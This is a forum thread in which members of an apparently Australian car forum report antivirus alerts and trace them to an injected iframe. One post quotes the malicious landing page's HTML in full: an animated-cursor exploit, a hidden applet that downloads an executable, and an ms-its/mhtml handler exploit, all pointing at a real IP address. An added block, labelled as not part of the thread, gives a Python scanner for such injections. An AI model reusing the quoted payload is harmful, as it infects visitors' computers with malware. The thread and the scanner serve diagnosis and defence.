Virus Alert
-
- Posts: 993
- Joined: Wed Dec 15, 2004 6:19 pm
- Location: Brisbane
Virus Alert
I'm getting virus warnings from Nortons about a few trojans this morning. You would have all gotten emails, but it affected me firstly in FF, but now IE as well.
I don't know why I'm typing this, since if you can read it, you too would have virus alerts going off everywhere.
Anyway, you've all been warned. I won't be back here until Norbs sends an all clear email out.
- w00dsy
- The Senna of Hoppers Crossing
- Posts: 24457
- Joined: Wed Mar 02, 2005 2:41 pm
- Location: incognito
I have gotten 'missing plugin' requests from Firefox, but no plugin can be found. My AV hasn't picked up anything yet in any browser, IE6, IE7 or Opera. Norbs did a virus scan of the server host and it came up fine, so I have no idea what could be causing this. Best bet is to make sure your AV is up to date, don't install anything if asked, and hopefully we can have this sorted out soon.
- Rots
- DiscoStu
- Posts: 4602
- Joined: Thu Dec 16, 2004 8:42 am
-
- Smooth Lubricator.
- Posts: 12070
- Joined: Sun Jun 26, 2005 7:48 pm
- Location: The wet central coast
I could not just stand aside, of course, hehe. First thing for me was to fire up Firefox and see what's up.
What I found....:
first: you don't have to worry, there's no auto-install on Firefox. Just don't click on the install button. Even if you do, nothing seems to happen.
second:
this address, down the bottom, raises the need for the plugin:
(It's in an iframe)
http://65.19.154.20/adverts/07/1.php
very much looks like a counter code or similar, here's the output:
I really don't want to dig into it any more, it's simpler to disregard or switch off than start and go into it.
<html><head><title></title></head><body>
<style>
* {CURSOR: url("http://65.19.154.20/adverts/07/sploit.anr")}
</style>
<APPLET ARCHIVE='count.jar' CODE='BlackBox.class' WIDTH=1 HEIGHT=1>
<PARAM NAME='url' VALUE='http://65.19.154.20/adverts/07/win32.exe'></APPLET>
<script>
try{
document.write('<object data=`ms-its:mhtml:file://C:\foo.mht!'+'http://65.19.154.20//adv'+'erts//07//targ.ch'+'m::/targ'+'et.htm` type=`text/x-scriptlet`></ob'+'ject>');
}catch(e){}
</script>
</body></html>
by the way here's an article on a similar subject - or maybe the same:
http://www.edbott.com/weblog/archives/000562.html
If you're afraid, just use Opera in the meantime.
by the way NOD32 did not go off for me...
maybe the worst of the thing has been switched off in the meantime?
Surprise, no sig. Now there is. Or is there?
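For admins checking stored templates or database content for this kind of injection, here is a small scanner built from the markers visible in the output quoted in the post above. It is an added example, not part of the original thread; the host names, sample markup and function names are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Heuristics taken from the markup quoted in the post above.
IP_HOST = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")
RAW_PATTERNS = {
    "protocol-handler URL (ms-its:/mhtml:)": re.compile(r"ms-its:|mhtml:", re.I),
    "remote cursor file in CSS": re.compile(r"cursor\s*:\s*url\(\s*[\"']?https?://", re.I),
}

class InjectionScanner(HTMLParser):
    """Collects findings for tags that match the pattern seen in the thread."""
    def __init__(self, own_hosts):
        super().__init__()
        self.own_hosts = set(own_hosts)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # names arrive lower-cased
        if tag == "iframe":
            host = urlparse(a.get("src", "")).hostname or ""
            if host and host not in self.own_hosts:
                kind = "raw-IP" if IP_HOST.match(host) else "off-site"
                self.findings.append(f"{kind} iframe: {host}")
        elif tag in ("applet", "object", "embed"):
            if a.get("width") in ("0", "1") and a.get("height") in ("0", "1"):
                self.findings.append(f"near-invisible <{tag}>")

def scan(html, own_hosts=()):
    """Return a list of findings for one template or stored post body."""
    parser = InjectionScanner(own_hosts)
    parser.feed(html)
    parser.close()
    for label, rx in RAW_PATTERNS.items():
        if rx.search(html):
            parser.findings.append(label)
    return parser.findings

# Constructed samples (documentation IP range, not the address from the thread).
CLEAN = '<div class="footer"><a href="http://forum.example/faq">FAQ</a></div>'
INJECTED = CLEAN + '<iframe src="http://192.0.2.10/adverts/1.php" width="0" height="0"></iframe>'
LANDING = ('<style>* {CURSOR: url("http://192.0.2.10/a.anr")}</style>'
           "<APPLET ARCHIVE='c.jar' CODE='X.class' WIDTH=1 HEIGHT=1></APPLET>")

if __name__ == "__main__":
    for name, doc in (("clean", CLEAN), ("injected", INJECTED), ("landing", LANDING)):
        print(name, scan(doc, own_hosts={"forum.example"}))
```

Run it over each template file and each text column exported from the forum database; any finding on content the admins did not write is the place to look.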
- GT VIRUS
- Karen
- Posts: 3637
- Joined: Mon Jul 04, 2005 4:33 pm
- Location: Adelaide
- Big Kev
- Clean as a Whistle
- Posts: 15093
- Joined: Mon Dec 13, 2004 7:09 pm
- Location: Little Britain
I've been away for the weekend. I'm back now. I'll get on it.
OK I know what it is and where it is but I can't get to it till Norbs is online.
ARSE Biscuits! Driftu Kingu!
My Flickr Stream
-
- Posts: 807
- Joined: Mon Dec 13, 2004 11:47 pm
- Location: Woooooooohoooooooo
- AstrO
- Help Desk Expert
- Posts: 4839
- Joined: Tue Jun 28, 2005 9:28 pm
- Location: Adelaide
- Bauer
- Posts: 7264
- Joined: Wed Dec 22, 2004 9:00 pm
- Location: Tassie
- Big Kev
- Clean as a Whistle
- Posts: 15093
- Joined: Mon Dec 13, 2004 7:09 pm
- Location: Little Britain
Well, I haven't actually touched anything yet!
It looks like sploit.anr is a JavaScript trojan. So, despite us being up to date on our forum software, it looks like there's an exploit in it somewhere. Possibly through the Google ads.
As soon as Norbs gets back to me I'll check the database where I think the trojan is hiding.
ARSE Biscuits! Driftu Kingu!
My Flickr Stream
- Btd69
- Posts: 266
- Joined: Wed Dec 15, 2004 2:24 pm
- Location: Australia